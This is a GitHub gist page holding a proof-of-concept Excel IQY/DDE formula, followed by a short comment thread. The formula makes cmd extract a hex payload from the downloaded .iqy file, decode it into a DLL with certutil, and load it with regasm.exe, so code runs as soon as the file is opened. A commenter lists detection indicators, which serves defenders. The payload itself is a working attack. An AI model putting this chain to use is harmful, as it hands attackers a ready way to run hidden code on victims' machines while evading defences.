Mr-Un1k0d3r/remote.iqy

Last active April 27, 2022 19:25

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/Mr-Un1k0d3r/abdcf16ebcef5842c7f79ee6686271e7.js"></script>
Save Mr-Un1k0d3r/abdcf16ebcef5842c7f79ee6686271e7 to your computer and use it in GitHub Desktop.

Download ZIP

IQY File Remote Payload POC

Raw

=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'

vysecurity commented Jul 15, 2019

Extract line 12 of the IQY file.
Decode hex using Certutil.exe
Output to dll file in temp folder called poc.dll
Use regasm.exe to load the dll into memory

IOCs:

Certutil.exe execution with -decodehex flag
Write to temp folder with poc.dll
Regasm.exe with /U flag
More with /E flag

Neat work.

Author

Mr-Un1k0d3r commented Jul 15, 2019

Yeah keep in mind that the certutil is not mandatory same with the regasm. This is just a POC :)

vysecurity commented Jul 15, 2019 via email

;) Just saw it and thought it was cool!

On Mon, Jul 15, 2019 at 11:58 AM Mr.Un1k0d3r ***@***.***> wrote: Yeah keep in mind that the certutil is not mandatory same with the regasm. This is just a POC :) — You are receiving this because you commented. Reply to this email directly, view it on GitHub <https://gist.github.com/abdcf16ebcef5842c7f79ee6686271e7?email_source=notifications&email_token=AA3N7UQCVUNFLURPYCVNPHTP7PYX5A5CNFSM4IDSYY72YY3PNVWWK3TUL52HS4DFVNDWS43UINXW23LFNZ2KUY3PNVWWK3TUL5UWJTQAFVJQ4#gistcomment-2970382>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AA3N7UTYR6MAJ7JIIQVFX5LP7PYX5ANCNFSM4IDSYY7Q> .

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment